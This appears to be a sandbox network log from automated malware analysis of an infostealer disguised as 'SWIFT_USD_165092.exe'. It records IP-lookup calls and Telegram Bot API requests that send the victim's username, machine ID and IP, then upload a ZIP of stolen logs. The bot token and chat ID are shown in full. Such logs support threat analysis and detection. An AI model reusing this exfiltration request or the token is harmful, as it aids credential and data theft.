                                                                                      May 22, 2023 19:49:51.973365068 CEST6532353192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:49:51.993510008 CEST53653238.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:49:52.336992979 CEST5148453192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:49:52.363151073 CEST53514848.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:49:57.171255112 CEST6344653192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:49:57.199857950 CEST53634468.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:50:27.063637972 CEST5503953192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:50:27.086931944 CEST53550398.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:50:34.611637115 CEST5506853192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:50:34.637907982 CEST53550688.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:50:34.649491072 CEST5668253192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:50:34.675643921 CEST53566828.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:50:38.433897972 CEST5853253192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:50:38.459300995 CEST53585328.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:50:46.969841957 CEST6265953192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:50:46.990375996 CEST53626598.8.8.8192.168.2.5
                                                                                      May 22, 2023 19:51:34.396444082 CEST5858153192.168.2.58.8.8.8
                                                                                      May 22, 2023 19:51:34.419713020 CEST53585818.8.8.8192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 22, 2023 19:49:51.921468019 CEST | 192.168.2.5 | 8.8.8.8 | 0xc38 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:51.973365068 CEST | 192.168.2.5 | 8.8.8.8 | 0x3080 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:52.336992979 CEST | 192.168.2.5 | 8.8.8.8 | 0xed73 | Standard query (0) | ipapi.co | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:57.171255112 CEST | 192.168.2.5 | 8.8.8.8 | 0xa587 | Standard query (0) | 245.246.1.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
May 22, 2023 19:50:27.063637972 CEST | 192.168.2.5 | 8.8.8.8 | 0x14a0 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:34.611637115 CEST | 192.168.2.5 | 8.8.8.8 | 0x5aed | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:34.649491072 CEST | 192.168.2.5 | 8.8.8.8 | 0x5a6b | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:38.433897972 CEST | 192.168.2.5 | 8.8.8.8 | 0xc86c | Standard query (0) | ipapi.co | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:46.969841957 CEST | 192.168.2.5 | 8.8.8.8 | 0xfa79 | Standard query (0) | 245.246.1.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
May 22, 2023 19:51:34.396444082 CEST | 192.168.2.5 | 8.8.8.8 | 0xd318 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 22, 2023 19:49:51.942271948 CEST | 8.8.8.8 | 192.168.2.5 | 0xc38 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
May 22, 2023 19:49:51.942271948 CEST | 8.8.8.8 | 192.168.2.5 | 0xc38 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:51.942271948 CEST | 8.8.8.8 | 192.168.2.5 | 0xc38 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:51.942271948 CEST | 8.8.8.8 | 192.168.2.5 | 0xc38 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:51.993510008 CEST | 8.8.8.8 | 192.168.2.5 | 0x3080 | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
May 22, 2023 19:49:51.993510008 CEST | 8.8.8.8 | 192.168.2.5 | 0x3080 | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:51.993510008 CEST | 8.8.8.8 | 192.168.2.5 | 0x3080 | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:51.993510008 CEST | 8.8.8.8 | 192.168.2.5 | 0x3080 | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:52.363151073 CEST | 8.8.8.8 | 192.168.2.5 | 0xed73 | No error (0) | ipapi.co | | 172.67.69.226 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:52.363151073 CEST | 8.8.8.8 | 192.168.2.5 | 0xed73 | No error (0) | ipapi.co | | 104.26.9.44 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:52.363151073 CEST | 8.8.8.8 | 192.168.2.5 | 0xed73 | No error (0) | ipapi.co | | 104.26.8.44 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:49:57.199857950 CEST | 8.8.8.8 | 192.168.2.5 | 0xa587 | Name error (3) | 245.246.1.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
May 22, 2023 19:50:27.086931944 CEST | 8.8.8.8 | 192.168.2.5 | 0x14a0 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:34.637907982 CEST | 8.8.8.8 | 192.168.2.5 | 0x5aed | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
May 22, 2023 19:50:34.637907982 CEST | 8.8.8.8 | 192.168.2.5 | 0x5aed | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:34.637907982 CEST | 8.8.8.8 | 192.168.2.5 | 0x5aed | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:34.637907982 CEST | 8.8.8.8 | 192.168.2.5 | 0x5aed | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:34.675643921 CEST | 8.8.8.8 | 192.168.2.5 | 0x5a6b | No error (0) | api.ipify.org | api4.ipify.org | | CNAME (Canonical name) | IN (0x0001) | false
May 22, 2023 19:50:34.675643921 CEST | 8.8.8.8 | 192.168.2.5 | 0x5a6b | No error (0) | api4.ipify.org | | 173.231.16.76 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:34.675643921 CEST | 8.8.8.8 | 192.168.2.5 | 0x5a6b | No error (0) | api4.ipify.org | | 64.185.227.155 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:34.675643921 CEST | 8.8.8.8 | 192.168.2.5 | 0x5a6b | No error (0) | api4.ipify.org | | 104.237.62.211 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:38.459300995 CEST | 8.8.8.8 | 192.168.2.5 | 0xc86c | No error (0) | ipapi.co | | 172.67.69.226 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:38.459300995 CEST | 8.8.8.8 | 192.168.2.5 | 0xc86c | No error (0) | ipapi.co | | 104.26.9.44 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:38.459300995 CEST | 8.8.8.8 | 192.168.2.5 | 0xc86c | No error (0) | ipapi.co | | 104.26.8.44 | A (IP address) | IN (0x0001) | false
May 22, 2023 19:50:46.990375996 CEST | 8.8.8.8 | 192.168.2.5 | 0xfa79 | Name error (3) | 245.246.1.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
May 22, 2023 19:51:34.419713020 CEST | 8.8.8.8 | 192.168.2.5 | 0xd318 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                      • ipapi.co
                                                                                      • api.telegram.org
                                                                                      • api.ipify.org
                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                      0192.168.2.549716172.67.69.226443C:\Users\user\Desktop\SWIFT_USD_165092.exe
                                                                                      TimestampkBytes transferredDirectionData


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49718 | 149.154.167.220 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49719 | 149.154.167.220 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.5 | 49725 | 172.67.69.226 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49726 | 149.154.167.220 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49727 | 149.154.167.220 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.5 | 49715 | 173.231.16.76 | 80 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
Timestamp | kBytes transferred | Direction | Data
May 22, 2023 19:49:52.181873083 CEST | 96 | OUT | GET / HTTP/1.1
  Host: api.ipify.org
  Connection: Keep-Alive
May 22, 2023 19:49:52.331671953 CEST | 97 | IN | HTTP/1.1 200 OK
  Content-Length: 11
  Content-Type: text/plain
  Date: Mon, 22 May 2023 17:49:52 GMT
  Vary: Origin
  Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
  Data Ascii: 84.17.52.45
May 22, 2023 19:49:55.058192968 CEST | 103 | OUT | GET / HTTP/1.1
  Host: api.ipify.org
May 22, 2023 19:49:56.102094889 CEST | 104 | IN | HTTP/1.1 200 OK
  Content-Length: 11
  Content-Type: text/plain
  Date: Mon, 22 May 2023 17:49:55 GMT
  Vary: Origin
May 22, 2023 19:49:56.158345938 CEST | 104 | IN | Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
  Data Ascii: 84.17.52.45
May 22, 2023 19:50:26.651664972 CEST | 115 | OUT | GET / HTTP/1.1
  Host: api.ipify.org
May 22, 2023 19:50:27.038357973 CEST | 116 | IN | HTTP/1.1 200 OK
  Content-Length: 11
  Content-Type: text/plain
  Date: Mon, 22 May 2023 17:50:26 GMT
  Vary: Origin
  Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
  Data Ascii: 84.17.52.45


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.5 | 49724 | 173.231.16.76 | 80 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
Timestamp | kBytes transferred | Direction | Data
May 22, 2023 19:50:38.269848108 CEST | 957 | OUT | GET / HTTP/1.1
  Host: api.ipify.org
  Connection: Keep-Alive
May 22, 2023 19:50:38.420283079 CEST | 957 | IN | HTTP/1.1 200 OK
  Content-Length: 11
  Content-Type: text/plain
  Date: Mon, 22 May 2023 17:50:38 GMT
  Vary: Origin
  Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
  Data Ascii: 84.17.52.45
May 22, 2023 19:50:46.786431074 CEST | 963 | OUT | GET / HTTP/1.1
  Host: api.ipify.org
May 22, 2023 19:50:46.941960096 CEST | 964 | IN | HTTP/1.1 200 OK
  Content-Length: 11
  Content-Type: text/plain
  Date: Mon, 22 May 2023 17:50:46 GMT
  Vary: Origin
  Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
  Data Ascii: 84.17.52.45
May 22, 2023 19:51:33.346762896 CEST | 967 | OUT | GET / HTTP/1.1
  Host: api.ipify.org
May 22, 2023 19:51:34.213435888 CEST | 967 | IN | HTTP/1.1 200 OK
  Content-Length: 11
  Content-Type: text/plain
  Date: Mon, 22 May 2023 17:51:33 GMT
  Vary: Origin
May 22, 2023 19:51:34.362384081 CEST | 967 | IN | Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 35
  Data Ascii: 84.17.52.45


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49716 | 172.67.69.226 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
Timestamp | kBytes transferred | Direction | Data
2023-05-22 17:49:53 UTC | 0 | OUT | GET /84.17.52.45/json HTTP/1.1
  User-Agent: ipapi.co /#c-sharp-v1.03
  Host: ipapi.co
  Connection: Keep-Alive
2023-05-22 17:49:54 UTC | 0 | IN | HTTP/1.1 200 OK
  Date: Mon, 22 May 2023 17:49:54 GMT
  Content-Type: application/json
  Content-Length: 751
  Connection: close
  Allow: GET, OPTIONS, POST, HEAD, OPTIONS
  X-Frame-Options: DENY
  Vary: Host, Origin
  X-Content-Type-Options: nosniff
  Referrer-Policy: same-origin
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ubt7o2vXNqcTJdj%2F8pZ3aXV%2FvoKJT%2BWFkcDZm%2Bgb0Yx1EyKgHKgL6lMJAFKe%2BG4KYaS2i0fGhg%2B1YjFk8YqN5kMRrjVwrok%2FqJg1KWOq6CBaLfvBWigVP%2B%2Bx"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 7cb6e5fc6f351bdb-FRA
2023-05-22 17:49:54 UTC | 0 | IN | Data Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 34 35 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 35 32 2e 30 2f 32 33 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 5a 75 72 69 63 68 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 5a 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 43 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 43 48 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 5f 69 73
  Data Ascii: { "ip": "84.17.52.45", "network": "84.17.52.0/23", "version": "IPv4", "city": "Zurich", "region": "Zurich", "region_code": "ZH", "country": "CH", "country_name": "Switzerland", "country_code": "CH", "country_code_is
2023-05-22 17:49:54 UTC | 1 | IN | Data Raw: 33 2c 0a 20 20 20 20 22 61 73 6e 22 3a 20 22 41 53 32 31 32 32 33 38 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 0a 7d
  Data Ascii: 3, "asn": "AS212238", "org": "Datacamp Limited"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49718 | 149.154.167.220 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
Timestamp | kBytes transferred | Direction | Data
2023-05-22 17:50:27 UTC | 1 | OUT | GET /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendMessage?chat_id=1689002171&text=New%20TyphonLogger%20log!%0A---------------------%0AUsername:%20user%0AMachine%20name:%20128757%0AHWID:%201B269386E0%0AIP%20address:%2084.17.52.45%0A---------------------%0ABuild%20Tag:%20%0A---------------------%0AYour%20logs%20are%20in%20the%20ZIP%20file%20being%20uploaded.%0AThank%20you%20for%20using%20TyphonLogger!%0Ahttps://t.me/typhon_shop HTTP/1.1
  Host: api.telegram.org
  Connection: Keep-Alive
2023-05-22 17:50:27 UTC | 1 | IN | HTTP/1.1 200 OK
  Server: nginx/1.18.0
  Date: Mon, 22 May 2023 17:50:27 GMT
  Content-Type: application/json
  Content-Length: 651
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Allow-Methods: GET, POST, OPTIONS
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2023-05-22 17:50:27 UTC | 2 | IN | Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 32 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 38 36 39 31 32 37 30 34 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 4d 74 72 61 64 65 20 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 6d 74 72 61 64 65 64 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 38 39 30 30 32 31 37 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 4d 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 54 72 61 64 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 6d 74 72 61 64 65 5f 30 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 38 34 37 37 37 38 32 37 2c 22 74
  Data Ascii: {"ok":true,"result":{"message_id":722,"from":{"id":5869127049,"is_bot":true,"first_name":"MMtrade Bot","username":"mmtraded_bot"},"chat":{"id":1689002171,"first_name":"MM","last_name":"Trade","username":"mmtrade_001","type":"private"},"date":1684777827,"t


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.5 | 49719 | 149.154.167.220 | 443 | C:\Users\user\Desktop\SWIFT_USD_165092.exe
Timestamp | kBytes transferred | Direction | Data
2023-05-22 17:50:27 UTC | 3 | OUT | POST /bot5869127049:AAE4vUitXNuHH_zpHPpNqKI8kJlNJ2I0Hss/sendDocument?chat_id=1689002171 HTTP/1.1
  Content-Type: multipart/form-data; boundary="0c552aff-97a1-416c-92c5-e86524fa2be5"
  Host: api.telegram.org
  Content-Length: 778795
  Expect: 100-continue
2023-05-22 17:50:27 UTC | 3 | IN | HTTP/1.1 100 Continue
2023-05-22 17:50:27 UTC | 3 | OUT | Data Raw: 2d 2d 30 63 35 35 32 61 66 66 2d 39 37 61 31 2d 34 31 36 63 2d 39 32 63 35 2d 65 38 36 35 32 34 66 61 32 62 65 35 0d 0a
  Data Ascii: --0c552aff-97a1-416c-92c5-e86524fa2be5
2023-05-22 17:50:27 UTC | 3 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 61 6c 66 6f 6e 73 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 5b 32 32 2e 30 35 2e 30 32 30 32 33 20 32 30 2e 34 38 2e 31 34 5d 3d 61 6c 66 6f 6e 73 40 31 32 38 37 35 37 5f 31 42 32 36 39 33 38 36 45 30 2e 7a 69 70 22 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 43 25 33 41 25 35 43 55 73 65 72 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 54 65 6d 70 25 35 43 25 35 42 32 32 2e 30 35 2e 30 32 30 32 33 25 32 30 32 30 2e 34 38 2e 31 34 25 35 44 25 33 44 61 6c 66 6f 6e 73 25 34 30 31 32 38
  Data Ascii: Content-Disposition: form-data; name=document; filename="C:\Users\user\AppData\Local\Temp\[22.05.02023 20.48.14]=user@128757_1B269386E0.zip"; filename*=utf-8''C%3A%5CUsers%5Cuser%5CAppData%5CLocal%5CTemp%5C%5B22.05.02023%2020.48.14%5D%3Duser%40128
                                                                                      Data Ascii: QNn0q\RXrDB,C#Y}&L<<{Qf\O~hi,a&%Q[v'c0 PFX41TRO|}FmV@MB:{m<mK#++K;mA89Vc'.^5-NY}OKGY'Nj~N]R>S0Q3
                                                                                      2023-05-22 17:50:27 UTC179OUTData Raw: e0 11 50 79 5a 8f 84 ad ec 21 75 1f d1 1b 8b de b8 42 c1 d2 e1 55 10 90 10 bb 9e 74 24 94 ce 8b 56 cd ab 67 00 43 c8 c0 0f 21 34 d1 46 8e ae 07 95 10 1c 10 20 b1 3a a7 1b 46 5b d8 e5 c3 0d 4a 0a 3d 5d e6 bf 8b 08 89 10 56 24 0e 5a 40 87 a0 8f de 00 68 ab 9a fe 4a 78 26 45 19 45 38 68 13 fe ae 3e e4 84 58 40 41 26 a3 55 15 a3 8c 60 ae dc 24 da 22 ad 54 34 aa 03 d2 04 f1 25 1e 54 12 a1 75 43 40 7d 62 f1 08 54 d9 f7 40 a6 bd a3 ca 76 07 ad 00 ba 05 08 a9 47 aa 67 2c 9e 70 45 09 af 57 40 e9 4e 7d 1c 56 58 ec 6d 41 b8 f9 a2 46 91 cf 49 98 2d 14 cd 80 3c f4 a2 fa a5 e6 c7 82 54 8f 3f 72 ba 7d df fa 2e c2 ed 8d 5e 5e bd 6a 0a 35 74 ab fd 40 fc 5a 90 22 25 4e 0a 32 59 83 21 2e 9d 2c 2a 38 7a 63 32 e5 8d 73 e0 79 6b b2 a2 d1 15 a9 74 f4 63 37 bb 12 ae 34 5a c9 58
                                                                                      Data Ascii: PyZ!uBUt$VgC!4F :F[J=]V$Z@hJx&EE8h>X@A&U`$"T4%TuC@}bT@vGg,pEW@N}VXmAFI-<T?r}.^^j5t@Z"%N2Y!.,*8zc2syktc74ZX
                                                                                      2023-05-22 17:50:27 UTC195OUTData Raw: 2b 5c 31 f6 42 5f 50 46 f5 6f e4 59 bb cf ad a7 f7 15 4e 3c 4c 67 2a 33 3d 0a 36 ea 59 bc 66 42 14 9a 9d 9d c8 c4 13 ae 4b 3f bd de c3 b9 10 1c a8 2c a9 90 1e f9 b2 7c db b9 7c 66 aa 6f b5 8f 55 46 30 77 de cb b9 46 e3 6f e6 6b db f2 eb f7 7b 38 4b e0 22 0a 7b 1a 2f e2 cc e6 b5 9c ef 13 62 23 3b e8 6a 52 a0 72 77 ed 5f 0e 60 a6 68 8a 1e 7d ac 3f e3 f8 2b 86 29 ea ff fd 5b 53 07 84 ad af 8a 24 18 fc 27 00 5f 54 4c 09 4c 21 a4 04 83 d5 79 85 00 a4 94 61 46 28 d0 36 44 5d a4 01 11 26 95 c2 72 0d b4 09 65 5b 27 10 46 88 3e d9 fc 59 34 5a 17 1e a2 43 01 fe 46 b1 84 46 68 2b 73 62 93 d0 ca 40 02 a9 ef 04 4c 19 9b 71 13 a2 4d ea b4 22 ae ad 7e 5d b5 46 79 53 b9 40 52 59 16 ed e2 00 bc 63 83 44 fe d7 41 86 5c 04 48 0a d5 d3 91 5a f4 38 e8 22 94 0b 71 f9 aa 61 b2
                                                                                      Data Ascii: +\1B_PFoYN<Lg*3=6YfBK?,||foUF0wFok{8K"{/b#;jRrw_`h}?+)[S$'_TLL!yaF(6D]&re['F>Y4ZCFFh+sb@LqM"~]FyS@RYcDA\HZ8"qa
                                                                                      2023-05-22 17:50:27 UTC211OUTData Raw: d2 d9 ed 90 40 da 30 8c 19 b1 de ab 81 ff e9 70 2b ec aa e0 ba 7c d3 1a 9b 83 db 6d 33 7d 23 fb ad bd dc e3 21 ae a7 8a 42 af f3 87 ef d8 88 fc ae 08 cc 48 0d 58 dd e5 d9 f2 0f 71 58 cf db 24 b3 a0 10 b4 0a bf 79 8b da c6 d5 8a cf 43 c4 b4 25 0c 13 99 c5 26 f6 6c ab d0 bc 31 60 6d 8a 28 6e 04 90 25 ce 2f c7 0b ba 88 f8 08 25 95 36 89 96 89 6d 36 8e fa a3 b9 27 10 17 18 cb f0 4f cb 28 33 59 91 a9 ad 10 30 08 a6 d8 0d 2b 49 6a cf 83 c1 70 c5 60 d8 40 bf 05 cf b5 e7 24 3e 22 64 c1 3d 89 54 42 70 d7 eb 27 b0 61 4f 56 ea 09 e9 08 52 30 4f b0 2e a7 30 be 68 26 b3 2e b8 9d ad 80 4d b8 a2 79 a7 14 f4 f9 0a 94 d4 c9 9c 4f 70 71 01 3b f8 19 c0 7e cf a7 88 42 c6 95 8c cd 79 8c 32 c4 20 59 e4 64 86 29 26 91 3a e5 61 e1 e1 98 68 10 ba 4f 0a 12 93 af 33 4d e5 86 56 40
                                                                                      Data Ascii: @0p+|m3}#!BHXqX$yC%&l1`m(n%/%6m6'O(3Y0+Ijp`@$>"d=TBp'aOVR0O.0h&.MyOpq;~By2 Yd)&:ahO3MV@
                                                                                      2023-05-22 17:50:27 UTC227OUTData Raw: 86 71 fb 0b ca 66 5e b5 c5 ea 60 90 f2 99 9d 70 8c 8c e4 c1 a9 1c 97 2c c7 d6 fd c1 1f 20 ff a9 bc 39 2b ae f7 73 b7 0c 2f 35 37 9a d9 61 b9 8a 50 4a fa aa 12 a5 e1 85 37 be e4 0b bc 4c 1e 4d 83 2b 9a 42 a6 f7 c6 3b 97 4c 7e 81 1b 58 65 f4 af 96 20 8c 42 ef 40 45 88 a5 30 90 b5 34 b1 84 31 3b 7f 8a 5e b2 86 9e 7e 46 ef 76 c1 4a df 1d 63 a2 07 bd 0e 9b 89 99 6e 09 cb 4e 09 85 32 17 79 0e 2b 5d c2 48 2f 22 f0 14 02 a7 27 32 40 20 70 10 54 1a 80 13 1d 28 98 7e 76 19 31 15 ad c3 4c 3f 32 16 5c c2 8c cf 10 4d a4 72 c7 21 b1 ee 4b ca ee 80 40 7d 8c 75 f7 20 f3 72 c7 2b 18 c2 8d 70 90 49 7b f1 49 4d 8f af 16 f8 84 d8 38 6f 82 64 3a 36 88 cb 1d 18 9c 19 dc 90 19 54 c6 48 c1 7a 31 a6 72 10 70 0a 70 f5 a7 28 6b b4 34 59 9e 83 0c ce 64 75 79 3e 0b bc c2 12 3d 7a 9a
                                                                                      Data Ascii: qf^`p, 9+s/57aPJ7LM+B;L~Xe B@E041;^~FvJcnN2y+]H/"'2@ pT(~v1L?2\Mr!K@}u r+pI{IM8od:6THz1rpp(k4Yduy>=z
                                                                                      2023-05-22 17:50:27 UTC243OUTData Raw: c0 61 c6 97 32 b5 75 08 78 71 30 c9 46 15 21 66 e7 70 92 b1 d2 85 10 f4 81 9c fc de 1e 87 a6 82 22 bb ff ae 62 7e 11 88 80 2d 2e fe 04 84 69 99 68 29 83 39 36 67 10 d0 d8 b3 a4 60 1c 9e f4 23 7e a4 1e 19 88 eb 80 86 90 64 b6 38 4c 25 e4 24 6c 06 06 57 c0 86 4c ae fb b4 8f 85 c6 01 aa d1 21 42 ac f8 0c 81 8d 5e df 75 dd 46 c9 0d 13 23 fe 9d d2 06 d9 49 15 32 5b e8 1e 40 30 46 ed f0 5b 69 73 4c b2 d1 6b ff f3 d4 2f b1 63 ec 94 d5 59 17 cc fd 5e 64 0f 99 24 82 94 16 aa ad 4c 69 71 34 d4 7b 27 e4 10 ed 38 46 ec 72 16 45 94 d5 de 8b 16 32 af 2f 9d 88 ba c3 f0 f3 4a 04 3f 04 95 5e fe 3c 5e 3a 3e 47 08 b3 ac 8f a0 68 e5 65 7e 63 19 3e f3 18 a9 7b a6 6e ed a8 2e 28 e8 dd 2c f0 85 a8 fd f1 3f 34 27 19 c8 cd 6d af 69 66 0e 1f 43 9e dc af ac 5d ff 5c e8 e0 76 bb 66
                                                                                      Data Ascii: a2uxq0F!fp"b~-.ih)96g`#~d8L%$lWL!B^uF#I2[@0F[isLk/cY^d$Liq4{'8FrE2/J?^<^:>Ghe~c>{n.(,?4'mifC]\vf
